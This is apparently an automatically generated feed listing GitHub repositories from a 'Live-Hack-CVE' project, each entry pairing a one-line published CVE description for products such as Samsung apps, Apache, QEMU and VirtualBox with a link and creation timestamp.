**Improper validation of integrity check vulnerability in Samsung Kies prior to version 2.6.4.22074 allows local attackers to delete arbitrary directory using directory junction. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39845](https://github.com/Live-Hack-CVE/CVE-2022-39845) create time: 2022-12-29T14:49:04Z

**Improper validation of integrity check vulnerability in Smart Switch PC prior to version 4.3.22083 allows local attackers to delete arbitrary directory using directory junction. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39844](https://github.com/Live-Hack-CVE/CVE-2022-39844) create time: 2022-12-29T14:49:00Z

**Exposure of Sensitive Information in Find My Mobile prior to version 7.2.25.14 allows local attacker to access IMEI via log. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36878](https://github.com/Live-Hack-CVE/CVE-2022-36878) create time: 2022-12-29T14:48:57Z

**Exposure of Sensitive Information in FaqSymptomCardViewModel in Samsung Members prior to versions 4.3.00.11 in Global and 14.0.02.4 in China allows local attackers to access device identification via log. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36877](https://github.com/Live-Hack-CVE/CVE-2022-36877) create time: 2022-12-29T14:48:53Z

**Improper authorization in UPI payment in Samsung Pass prior to version 4.0.04.10 allows physical attackers to access account list without authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36876](https://github.com/Live-Hack-CVE/CVE-2022-36876) create time: 2022-12-29T14:48:50Z

**Improper restriction of broadcasting Intent in SaWebViewRelayActivity of?Waterplugin prior to version 2.2.11.22081151 allows attacker to access the file without permission. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36875](https://github.com/Live-Hack-CVE/CVE-2022-36875) create time: 2022-12-29T14:48:43Z

**Improper Handling of Insufficient Permissions or Privileges vulnerability in Waterplugin prior to 2.2.11.22040751 allows attacker to access device IMEI and Serial number. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36874](https://github.com/Live-Hack-CVE/CVE-2022-36874) create time: 2022-12-29T14:48:39Z

**Improper restriction of broadcasting Intent in GalaxyStoreBridgePageLinker of?Waterplugin prior to version 2.2.11.22081151 leaks MAC address of the connected Bluetooth device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36873](https://github.com/Live-Hack-CVE/CVE-2022-36873) create time: 2022-12-29T14:48:36Z

**Improper access control vulnerability in Broadcaster in Group Sharing prior to versions 13.0.6.15 in Android S(12), 13.0.6.14 in Android R(11) and below allows attackers to identify the device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36866](https://github.com/Live-Hack-CVE/CVE-2022-36866) create time: 2022-12-29T14:48:32Z

**Improper access control and intent redirection in Samsung Email prior to 6.1.70.20 allows attacker to access specific formatted file and execute privileged behavior. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36864](https://github.com/Live-Hack-CVE/CVE-2022-36864) create time: 2022-12-29T14:48:19Z

**Samba does not validate the Validated-DNS-Host-Name right for the dNSHostName attribute which could permit unprivileged users to write it. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32743](https://github.com/Live-Hack-CVE/CVE-2022-32743) create time: 2022-12-29T14:48:15Z

**In Samba, GnuTLS gnutls_rnd() can fail and give predictable random values. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1615](https://github.com/Live-Hack-CVE/CVE-2022-1615) create time: 2022-12-29T14:48:12Z

**Improper access control in Group Sharing prior to versions 13.0.6.15 in Android S(12), 13.0.6.14 in Android R(11) and below allows attackers to access device information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36865](https://github.com/Live-Hack-CVE/CVE-2022-36865) create time: 2022-12-29T14:48:08Z

**Improper input validation vulnerability in SmartTagPlugin prior to version 1.2.21-6 allows privileged attackers to trigger a XSS on a victim's devices. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36859](https://github.com/Live-Hack-CVE/CVE-2022-36859) create time: 2022-12-29T14:48:05Z

**Improper access control vulnerability in Samsung pass prior to version 4.0.03.1 allow physical attackers to access data of Samsung pass on a certain state of an unlocked device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36851](https://github.com/Live-Hack-CVE/CVE-2022-36851) create time: 2022-12-29T14:48:01Z

**Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37882](https://github.com/Live-Hack-CVE/CVE-2022-37882) create time: 2022-12-29T14:47:57Z

**Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37881](https://github.com/Live-Hack-CVE/CVE-2022-37881) create time: 2022-12-29T14:47:54Z

**Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37879](https://github.com/Live-Hack-CVE/CVE-2022-37879) create time: 2022-12-29T14:47:51Z

**Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37878](https://github.com/Live-Hack-CVE/CVE-2022-37878) create time: 2022-12-29T14:47:31Z

**Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37880](https://github.com/Live-Hack-CVE/CVE-2022-37880) create time: 2022-12-29T14:47:28Z

**A vulnerability in the ClearPass OnGuard macOS agent could allow malicious users on a macOS instance to elevate their user privileges. A successful exploit could allow these users to execute arbitrary code with root level privileges on the macOS instance in Aruba ClearPass Policy Manager version(s): 6.10.x: 6.10.6 and CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37877](https://github.com/Live-Hack-CVE/CVE-2022-37877) create time: 2022-12-29T14:47:24Z

**Openwrt before v21.02.3 and Openwrt v22.03.0-rc6 were discovered to contain two skip loops in the function header_value(). This vulnerability allows attackers to access sensitive information via a crafted HTTP request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38333](https://github.com/Live-Hack-CVE/CVE-2022-38333) create time: 2022-12-29T14:47:21Z

**The installer of JetBrains IntelliJ IDEA before 2022.2.2 was vulnerable to EXE search order hijacking CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40978](https://github.com/Live-Hack-CVE/CVE-2022-40978) create time: 2022-12-29T14:47:17Z

**The d8s-pdfs for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-file-system package. The affected version is 0.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40812](https://github.com/Live-Hack-CVE/CVE-2022-40812) create time: 2022-12-29T14:47:13Z

**The d8s-ip-addresses for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-hypothesis package. The affected version is 0.1.0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40810](https://github.com/Live-Hack-CVE/CVE-2022-40810) create time: 2022-12-29T14:47:10Z

**The d8s-dicts for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-hypothesis package. The affected version is 0.1.0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40809](https://github.com/Live-Hack-CVE/CVE-2022-40809) create time: 2022-12-29T14:47:06Z

**The d8s-utility for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-networking package. The affected version is 0.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40430](https://github.com/Live-Hack-CVE/CVE-2022-40430) create time: 2022-12-29T14:47:03Z

**The d8s-asns for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-networking package. The affected version is 0.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40426](https://github.com/Live-Hack-CVE/CVE-2022-40426) create time: 2022-12-29T14:46:59Z

**The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and pare CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2002-0839](https://github.com/Live-Hack-CVE/CVE-2002-0839) create time: 2022-12-29T13:58:28Z

**mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2003-0789](https://github.com/Live-Hack-CVE/CVE-2003-0789) create time: 2022-12-29T13:58:25Z

**The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2004-0809](https://github.com/Live-Hack-CVE/CVE-2004-0809) create time: 2022-12-29T13:58:21Z

**The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2004-0786](https://github.com/Live-Hack-CVE/CVE-2004-0786) create time: 2022-12-29T13:57:56Z

**The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2004-0751](https://github.com/Live-Hack-CVE/CVE-2004-0751) create time: 2022-12-29T13:57:41Z

**Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2004-0747](https://github.com/Live-Hack-CVE/CVE-2004-0747) create time: 2022-12-29T13:57:37Z

**mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2004-0748](https://github.com/Live-Hack-CVE/CVE-2004-0748) create time: 2022-12-29T13:57:34Z

**Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2004-0488](https://github.com/Live-Hack-CVE/CVE-2004-0488) create time: 2022-12-29T13:57:31Z

**Rapid7 InsightVM suffers from an information exposure issue whereby, when the user's session has ended due to inactivity, an attacker can use the Inspect Element browser feature to remove the login panel and view the details available in the last webpage visited by previous user CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5641](https://github.com/Live-Hack-CVE/CVE-2019-5641) create time: 2022-12-29T13:58:31Z

**Waitress through version 1.3.1 allows request smuggling by sending the Content-Length header twice. Waitress would header fold a double Content-Length header and due to being unable to cast the now comma separated value to an integer would set the Content-Length to 0 internally. If two Content-Length headers are sent i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16792](https://github.com/Live-Hack-CVE/CVE-2019-16792) create time: 2022-12-29T13:22:58Z

**Waitress through version 1.3.1 implemented a "MAY" part of the RFC7230 which states: "Although the line terminator for the start-line and header fields is the sequence CRLF, a recipient MAY recognize a single LF as a line terminator and ignore any preceding CR." Unfortunately if a front-end server does not parse header CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16785](https://github.com/Live-Hack-CVE/CVE-2019-16785) create time: 2022-12-29T13:22:54Z

**Waitress through version 1.3.1 would parse the Transfer-Encoding header and only look for a single string value, if that value was not chunked it would fall through and use the Content-Length header instead. According to the HTTP standard Transfer-Encoding should be a comma separated list, with the inner-most encoding CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16786](https://github.com/Live-Hack-CVE/CVE-2019-16786) create time: 2022-12-29T13:22:50Z

**In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16789](https://github.com/Live-Hack-CVE/CVE-2019-16789) create time: 2022-12-29T13:22:47Z

**A NULL pointer dereference flaw was found in the am53c974 SCSI host bus adapter emulation of QEMU in versions before 6.0.0. This issue occurs while handling the 'Information Transfer' command. This flaw allows a privileged guest user to crash the QEMU process on the host, resulting in a denial of service. The highest t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35505](https://github.com/Live-Hack-CVE/CVE-2020-35505) create time: 2022-12-29T14:03:46Z

**A NULL pointer dereference flaw was found in the SCSI emulation support of QEMU in versions before 6.0.0. This flaw allows a privileged guest user to crash the QEMU process on the host, resulting in a denial of service. The highest threat from this vulnerability is to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35504](https://github.com/Live-Hack-CVE/CVE-2020-35504) create time: 2022-12-29T14:03:43Z

**hw/usb/hcd-ohci.c in QEMU 5.0.0 has a stack-based buffer over-read via values obtained from the host controller driver. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25624](https://github.com/Live-Hack-CVE/CVE-2020-25624) create time: 2022-12-29T13:57:26Z

**hw/usb/hcd-ohci.c in QEMU 5.0.0 has an infinite loop when a TD list has a loop. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25625](https://github.com/Live-Hack-CVE/CVE-2020-25625) create time: 2022-12-29T13:57:07Z

**QEMU 5.0.0 has a use-after-free in hw/usb/hcd-xhci.c because the usb_packet_map return value is not checked. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25084](https://github.com/Live-Hack-CVE/CVE-2020-25084) create time: 2022-12-29T13:57:03Z

**eth_get_gso_type in net/eth.c in QEMU 4.2.1 allows guest OS users to trigger an assertion failure. A guest can crash the QEMU process via packet data that lacks a valid Layer 3 protocol. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27617](https://github.com/Live-Hack-CVE/CVE-2020-27617) create time: 2022-12-29T13:56:59Z

**sd_wp_addr in hw/sd/sd.c in QEMU 4.2.0 uses an unvalidated address, which leads to an out-of-bounds read during sdhci_write() operations. A guest OS user can crash the QEMU process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13253](https://github.com/Live-Hack-CVE/CVE-2020-13253) create time: 2022-12-29T13:56:56Z

**QEMU 4.2.0 has a use-after-free in hw/net/e1000e_core.c because a guest OS user can trigger an e1000e packet with the data's address set to the e1000e's MMIO address. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15859](https://github.com/Live-Hack-CVE/CVE-2020-15859) create time: 2022-12-29T13:56:52Z

**In QEMU 4.2.0, a MemoryRegionOps object may lack read/write callback methods, leading to a NULL pointer dereference. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15469](https://github.com/Live-Hack-CVE/CVE-2020-15469) create time: 2022-12-29T13:56:48Z

**QEMU 5.0.0 has a heap-based Buffer Overflow in flatview_read_continue in exec.c because hw/sd/sdhci.c mishandles a write operation in the SDHC_BLKSIZE case. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25085](https://github.com/Live-Hack-CVE/CVE-2020-25085) create time: 2022-12-29T13:56:45Z

**A stored cross site scripting (XSS) vulnerability in index.php/legend/6.html of UK CMS v1.1.10 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the Comments section. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20977](https://github.com/Live-Hack-CVE/CVE-2020-20977) create time: 2022-12-29T13:55:53Z

**A cross site scripting (XSS) vulnerability in the Insert Video function of Froala WYSIWYG Editor 3.1.0 allows attackers to execute arbitrary web scripts or HTML. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22864](https://github.com/Live-Hack-CVE/CVE-2020-22864) create time: 2022-12-29T13:55:50Z

**The driving interface of Tesla Model 3 vehicles in any release before 2020.4.10 allows Denial of Service to occur due to improper process separation, which allows attackers to disable the speedometer, web browser, climate controls, turn signal visual and sounds, navigation, autopilot notifications, along with other mis CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10558](https://github.com/Live-Hack-CVE/CVE-2020-10558) create time: 2022-12-29T13:23:16Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM Virtual CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2309](https://github.com/Live-Hack-CVE/CVE-2021-2309) create time: 2022-12-29T14:05:28Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.28. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35540](https://github.com/Live-Hack-CVE/CVE-2021-35540) create time: 2022-12-29T14:04:44Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.28. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35538](https://github.com/Live-Hack-CVE/CVE-2021-35538) create time: 2022-12-29T14:04:40Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.28. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35542](https://github.com/Live-Hack-CVE/CVE-2021-35542) create time: 2022-12-29T14:04:36Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.28. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35545](https://github.com/Live-Hack-CVE/CVE-2021-35545) create time: 2022-12-29T14:04:29Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.24. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2442](https://github.com/Live-Hack-CVE/CVE-2021-2442) create time: 2022-12-29T14:04:23Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.24. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2409](https://github.com/Live-Hack-CVE/CVE-2021-2409) create time: 2022-12-29T14:04:19Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.24. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2443](https://github.com/Live-Hack-CVE/CVE-2021-2443) create time: 2022-12-29T14:04:15Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.28. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2475](https://github.com/Live-Hack-CVE/CVE-2021-2475) create time: 2022-12-29T14:04:12Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2312](https://github.com/Live-Hack-CVE/CVE-2021-2312) create time: 2022-12-29T14:04:08Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.24. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualB CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2454](https://github.com/Live-Hack-CVE/CVE-2021-2454) create time: 2022-12-29T14:04:04Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2280](https://github.com/Live-Hack-CVE/CVE-2021-2280) create time: 2022-12-29T14:04:01Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2282](https://github.com/Live-Hack-CVE/CVE-2021-2282) create time: 2022-12-29T14:03:57Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2281](https://github.com/Live-Hack-CVE/CVE-2021-2281) create time: 2022-12-29T14:03:53Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Difficult to exploit vulnerability allows unauthenticated attacker with network access via RDP to compromise Oracle VM VirtualBox. Successful attacks of this vulnerabi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2279](https://github.com/Live-Hack-CVE/CVE-2021-2279) create time: 2022-12-29T14:03:50Z

**A DMA reentrancy issue was found in the NVM Express Controller (NVME) emulation in QEMU. This CVE is similar to CVE-2021-3750 and, just like it, when the reentrancy write triggers the reset function nvme_ctrl_reset(), data structs will be freed leading to a use-after-free issue. A malicious guest could use this flaw to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3929](https://github.com/Live-Hack-CVE/CVE-2021-3929) create time: 2022-12-29T14:02:07Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM Virtual CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2296](https://github.com/Live-Hack-CVE/CVE-2021-2296) create time: 2022-12-29T14:01:04Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM Virtual CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2297](https://github.com/Live-Hack-CVE/CVE-2021-2297) create time: 2022-12-29T14:01:00Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2306](https://github.com/Live-Hack-CVE/CVE-2021-2306) create time: 2022-12-29T14:00:55Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2287](https://github.com/Live-Hack-CVE/CVE-2021-2287) create time: 2022-12-29T14:00:51Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2286](https://github.com/Live-Hack-CVE/CVE-2021-2286) create time: 2022-12-29T14:00:47Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualB CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2291](https://github.com/Live-Hack-CVE/CVE-2021-2291) create time: 2022-12-29T14:00:44Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2284](https://github.com/Live-Hack-CVE/CVE-2021-2284) create time: 2022-12-29T14:00:40Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2283](https://github.com/Live-Hack-CVE/CVE-2021-2283) create time: 2022-12-29T14:00:37Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2285](https://github.com/Live-Hack-CVE/CVE-2021-2285) create time: 2022-12-29T14:00:33Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2250](https://github.com/Live-Hack-CVE/CVE-2021-2250) create time: 2022-12-29T14:00:30Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2264](https://github.com/Live-Hack-CVE/CVE-2021-2264) create time: 2022-12-29T14:00:26Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM Virtual CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2145](https://github.com/Live-Hack-CVE/CVE-2021-2145) create time: 2022-12-29T14:00:23Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.20. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2266](https://github.com/Live-Hack-CVE/CVE-2021-2266) create time: 2022-12-29T14:00:19Z

**Vulnerability in the Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u291, 8u281, 11.0.10, 16; Java SE Embedded: 8u281; Oracle GraalVM Enterprise Edition: 19.3.5, 20.3.1.2 and 21.0.0.2. Difficult to exploit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2163](https://github.com/Live-Hack-CVE/CVE-2021-2163) create time: 2022-12-29T14:00:16Z

**IBM Maximo Asset Management 7.6.1.1, 7.6.1.2, and 7.6.1.3 could allow a user to bypass authentication and obtain sensitive information or perform tasks they should not have access to. IBM X-Force ID: 236311. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40616](https://github.com/Live-Hack-CVE/CVE-2022-40616) create time: 2022-12-29T14:07:35Z

